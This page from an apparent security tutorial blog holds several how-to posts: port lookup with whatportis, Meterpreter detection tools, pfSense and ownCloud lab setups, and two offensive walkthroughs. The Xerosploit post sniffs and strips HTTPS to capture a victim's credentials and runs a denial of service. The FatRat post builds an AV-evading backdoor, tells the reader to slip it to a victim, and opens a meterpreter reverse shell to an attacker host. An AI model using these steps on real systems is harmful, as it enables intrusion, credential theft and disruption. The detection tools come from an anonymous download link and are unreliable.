Showing posts with label Hacking Tools. Show all posts
Showing posts with label Hacking Tools. Show all posts

Search Port Names and Numbers using whatportis

Whatportis is a utility command to search port numbers and/or names. It often happens that we need to find the default port number for a specific service, or what service is normally listening on a given port.

Many a times what happens is while running an nmap command, we encounter various ports whose information are missing or we couldn’t recognize the port. At that time, whatportis will be helpful.

To run the command, we first need to download the utility from github. To install whatportis from github, we type the following command:


>pip install whatportis


If the dependencies of the utility are already installed on your pc, it will take less time to install; else the installation time will depend on your connection speed.

Once, the utility is installed, we can run the command, ‘whatportis’.
For example, I want to check what all port names are there for the port number 80, so I type:

>whatportis 80


As we can see that all the port names associated with the port 80 is displayed on the screen.
Another example could be:

>whatportis 3389


And whatportis displays 3389 successfully, which is a Microsoft WBT Server port.
Yet another example is:

>whatportis 445


Where, 445 is a Microsoft-ds port. We can confirm the result on internet or consulting any good book.

How to Detect Meterpreter in Your PC

Anti-metasploit is an article to know about how can you detect if you are hacked by someone through metasploit or not. Today, most of the time we stumble upon the ways about how we can be hacked or how to hack someobe but no one tells you that how to detect if you are hacked.
So, therefore, in this article we will learn how to detect of you are hacked someone through metasploit. And to this there are two tools :

·         Antipwny
·         Antimeter
Both of these tools will help us to acheive our goal. These tools help you kill the meterpreter session that your hacker has gained. You can download these tools from --> http://www88.zippyshare.com/v/t6FjCuTR/file.html

Antipwny

When you will double click on the software, a daiogue box will open and it will show the meterpreter file running in your computer as show : 


Now, right click on the process and select kill process option.


And so you can detect the file and stop it too in just two simple steps.

Antimeter
When you open this software, it will scan the whole computer and it show the virus containing file. Also, it will ask you to kill the process or not. So, you type y for yes and the process will die.


Thus, the ways to detect if you have been hacked. These tools does not only allow us to detect the file but helps us to kill it also that too in two simple steps. When the steps are completed your hacker will loose the session making you safe and secure. So go on and raise your head against these exploiting hackers.

Perform Man in the Middle Attack in Network using Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow realising efficient attacks, and also allows carrying out denial of service attacks and port scanning. Powered by bettercap and nmap
First of all the github repo with command:

git clone https://github.com/LionSec/xerosploit.git


Now install xerosploit by running the python script in cloned folder with command:
./install.py


Now run xerosploit with command:
xerosploit


Now run the following command on xerosploit console to know the initial commands:
help
And now scan the network for connected devices with command:
scan


Now enter the IP of the targeted system on the terminal.


Now enter help command on the console to view all the available modules


We will be using the 4 modules in this article:

DRIFTNET
First of all we will use driftnet module to capture all the images the victim is surfing on the web with following commands:

driftnet
run


All the captured images will be saved in the /opt/xerosploit/xedriftnet directory.


 REPLACE
Now we will use a replace module to replace the all the images on the victim’s web browser with command:
replace
And then to execute the module enter command:
run
And then give the path to the image file you want to be replaces with.
Hit ctrl^c to stop the attack.


As you can see the images on the victim’s browser are replaced with our image.


SNIFF
Now run the following module to sniff all the traffic of the victim with command:
sniff
and then enter the following command to execute that module:
run
Now it will ask you if you want to use SSLTRIP to strip the HTTPS URl’s to HTTP so that we can the catch the login credentials in clear text. So enter y.


Now it will open a separate terminal in which we can see all the credentials in clear text. As you can see it has successfully captured the login credentials.


DOS
Now we will dos (denial of service) the victim’s system with module dos which will cause the target unresponsive, so run commands:
dos
run
Hit ctrl^c to stop the attack


For More Details Visit Here

Hack Remote Windows 10 PC using FatRat

TheFatRat is an easy tool for generate backdoor with msfvenom ( part of metasploit framework ) and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on a windows host Program to create a C program after it is compiled that will bypass most AV

First, to install thefatrat we type the following command on terminal:


git clone https://github.com/Screetsec/TheFatRat.git


Once the cloning is done, go to the installed directory of fatrat and open it in terminal and type the following command to start it:

./fatrat

It will show you many options now select option 1 which is to CREATE BACKDOOR WITH MSFVENOM.


Now it will give a list of options to choose the format of the backdoor which you have to choose as per your requirements and need. To create a windows executable as a backdoor choose option 2.


 Now enter the LHOST IP i.e. your system IP and LPORT i.e. the port you want the reverse connection on your i.e. attacker system. In my case the LHOST is 192.168.0.104 and LPORT is 4444.
And then exit the script by selecting y when asked


Now the generated backdoor will be present in the output directory.


Now use any trick up your sleeve to transport the backdoor to the victim and set up reverse handler on metasploit with the following commands on the msf terminal-
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104 (the attacker system IP)
set lport 4444
exploit

Now as soon as the backdoor is executed on the victim’s machine you will get a meterpreter shell as you can see in my case.


For More Details Visit Here

Firewall Pentest Lab Setup with pfsense in Vmware

Firewall: It is a computer system or network that is designed to block unauthorized access while permitting outward communication. Firewall holds a lot of importance our technical world as it assures our system's as well as data's security. And a firewall in a network helps us to secure the whole network. It acts as a network security device that grants or rejects network access to traffic flows between untrusted zones. Thus, importance of Firewall.

To secure a network we should always use a third party firewall instead of windows own firewall as it make configuration of all network easy and in one system only. If you will use windows own firewall you have to configure if PC by PC which will take a lot of your time.

Setting up a firewall can be complicating. Therefore in this article we will learn how to set up a firewall using PFSense. By setting this firewall we will create a wall between our networks which will delude our network into two parts i.e External network and internal network.

You can download ISO image for PFSenese from here:

Now that you have ISO image, setup PFSense in your virtual machine just like you setup your windows and turn its power on and PFSense will open: 


And it will boot itself automatically in few seconds:


Once it’s rebooted, select accept these Settings


From the next dialogues box select Quick/Easy Install.


When you click on ok it will allow installation process to begin without asking unnecessary questions:


And the installation begins:


Now for installing custom configuration select Standard Kernel option.


And it will start installing:


Now, select Reboot option so that the firewall can start.


Thus, rebooting will begin.


After the rebooting process, it will ask you if you want to setup VLAN's. Here just type n for no and hit enter.


Now it will ask you to name WAN and LAN interface. Give le0 name to WAN and le1 to LAN. Then just hit enter when it asks you to name optional interface.


It will show you the interfaces and their name now and will require your permission to proceed. Press y for yes as you are permitting it to proceed.


Now, in the following image you can see that it has automatically taken IP address for WAN i.e 192.168.1.7, if you wish to set a desired IP for WAN then choose 2 option and press 1 for the configuration of WAN.


It will ask you that if you want to assign IPv4 IP address. Here, press n for no. When you hit enter it will ask you if you want to assign IPv4 IP address. Here, enter your desired IP address and press enter. Then it will ask you to give subnet mask for the IP address that you have just entered. Now as our IP address was of C-class we will give 24 as subnet mask. After hitting enter it will ask you if you u want to give upstream gateway. Here, just press enter. And when it asks you to set IPv6 via DHCP6 then simply press enter without typing anything else as we do not require IPv6. And when it asks you for HTTP web configuration press n for no.


You can see that your desired IP for WAN has been set up. Hit enter to continue.


Similarly, you can setup LAN IP address by selecting of 2 for assigning IP address and select 2 for LAN.


Just like before, it will sak uou for the IP address of LAN and so you enter your LAN IP address. And then it will ask you for subnet mask, here we have given subnet mask of 8 as our IP is of A-class. Just hit enter when it asks you to enter upstream gateway. And also hit enter when it asks you to enter IPv6 as we do not require it. And then press y for HTTP revert option.


And just like this, your LAN IP address has been set up. Now, press enter to continue.


Now to check that your firewall has been configured properly, lets ping an IP address. Select option 7 and enter the IP address you want to ping. If it successfully pings that means your firewall has been configured successfully. And you can press enter to continue.


So, this is how you can install and configure your firewall to protect your network.

How to Setup own Cloud Computing Lab



XAMPP is the most popular PHP development environment. XAMPP is a completely free, easy to install Apache distribution containing MariaDB, PHP and Perl. The XAMPP open source package has been set up to be incredibly easy to install and to use.
Download XAMPP from here:

https://www.apachefriends.org/index.html

To install XAMPP, run the XAMPP setup and follow the on screen commands.




Allow access to XAMPP in windows firewall


Now, start the XAMPP control panel and start Apache and MySQL services. If the Apache is not being started, then that is because the given ports 80 and/or 443 are not free. To change Apache ports, go to ‘Config’  button (next to admin button in control panel.)  and change the 1st and 2nd files.
In the first file, change all 80 with 81, and in the second file, change all 443 with 444


Now, go to the installed XAMPP directory and paste the ownCloud server folder in installed directory/htdocs.
Usually the installed directory is: C:\xampp\htdocs
About ownCloud:

OwnCloud is a self-hosted file sync and share server. It provides access to your data through a web interface, sync clients or WebDAV while providing a platform to view, sync and share across devices easily — all under your control. ownCloud’s open architecture is extensible via a simple but powerful API for applications and plug-in and it works with any storage.
Download ownCloud server and client software both from here


https://owncloud.org/



Now, open your web browser and type:
localhost:81/ownCloud (assuming the name of the server is ownCloud)
Type in your admin username and admin password then. Do remember this name and password.


A popup will then appear which will tell you that ownCloud clients are available for different mobile phones platform; you might want to check that out as well.


On the right hand side top you will see your admin name, click on that and a popup will fall having many options. Click on ‘users’.


You can see a bar on the top of the page, you ought to input your client ID and password. This client ID and password is the key to your cloud files for the client. So, the client will access the files you share with them in the next step with their ID and password that you give them. No one else but admin (that is you) can see all the clients. All you have to do is give your client their ID and password, and they are ready to use ownCloud.

Type in the details and click create.

Now once the client is created, go to home page again and click on the upload button.


Choose a file to upload. I choose a text file and in the same row as your uploaded file there will be an option to share the file on cloud. Choose that option and fill in the name of client with which you want to share your file. I input the name of client as Hacking Articles.


Now, on the client PC, install the ownCloud Desktop client software.


Input the IP address of the server followed by the port and directory.
In my case, the ownCloud client types:
https://192.168.0.102:81/ownCloud



Now, the client inputs his/her username and password and connects to the server.




Then, click on open ownCloud.


The client inputs his username and password again.


In the activity bar, he/she can see the file shared by the admin.